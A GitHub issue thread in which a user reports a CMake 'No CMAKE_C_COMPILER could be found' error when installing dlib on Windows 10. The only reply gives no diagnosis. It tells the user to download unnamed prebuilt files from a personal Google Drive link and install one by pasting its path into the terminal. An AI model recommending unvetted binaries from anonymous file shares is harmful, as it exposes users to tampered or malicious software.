### ISSUE TITLE
dlib install error

### ISSUE THREAD

**Issue by HossamAbdelraof** [davisking/dlib#2678]
### Discussed in https://github.com/davisking/dlib/discussions/2677

<div type='discussions-op-text'>

<sup>Originally posted by **HossamAbdelraof** October 29, 2022</sup>
iam trying to install dlib in win10 using python pip and each time this error pop 
```
      -- Building for: Visual Studio 17 2022
      -- Selecting Windows SDK version  to target Windows 10.0.19044.
      -- The C compiler identification is unknown
      -- The CXX compiler identification is unknown
      CMake Error at CMakeLists.txt:14 (project):
        No CMAKE_C_COMPILER could be found.



      CMake Error at CMakeLists.txt:14 (project):
        No CMAKE_CXX_COMPILER could be found.
```
tried to clone  and build using cmake 
```
git clone https://github.com/davisking/dlib.git cd dlib mkdir build; cd build; cmake ..; cmake --build . 

#until here it worked fine but when run this 
cd .. 
python3 setup.py install
```
it return the same error 

i have vs 17 2022, re downloaded it many times and nothing happen 
any one can help ?
</div>

**Comment by Suchir2004** [comment]
Download the dlib files
Link - https://drive.google.com/file/d/11Hip8-llWEm5GN3_u4ibI09unL7xCw0g/view?usp=drivesdk
And just copy the path of that file and paste it into the terminal.
Stable version is 10 among all files that you have been downloaded from the link

In terminal you just need copy the path of that particular file; there are 4 files the choose one which is suitable for your computer work on windows.
